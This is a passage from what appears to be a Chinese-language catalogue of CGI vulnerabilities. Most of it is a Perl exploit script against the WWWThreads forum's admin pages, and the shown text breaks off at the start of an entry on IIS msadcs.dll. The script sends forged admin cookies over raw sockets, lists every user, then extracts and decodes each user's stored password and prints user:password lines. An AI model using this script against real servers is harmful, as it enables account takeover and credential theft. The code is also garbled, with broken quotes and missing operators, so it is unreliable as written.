|
CGI漏洞(30) $parms="Cat=&Start=$let";
$tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n"; my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
push @users, $1;}}} $usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
"Fetching individual passwords...\r\n"; foreach $user (@users){
$parms="User=$user";
$tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n"; my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/OldPass value = "([^"]+)"/){
($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
print $user.‘:‘.$pass."::::::::::\n";
last;}}} print STDERR "done.\r\n\r\n"; sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) die("inet_aton problems";
socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp‘)0)
die("Socket problems\n";
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("Can‘t connect...\n"; }} 四十三.msadcs.dll
IIS 4.0的缺省安装设置的是MDAC1.5,这个安装下有一个/msadc/msadcs.dll的文件,也允许
| 
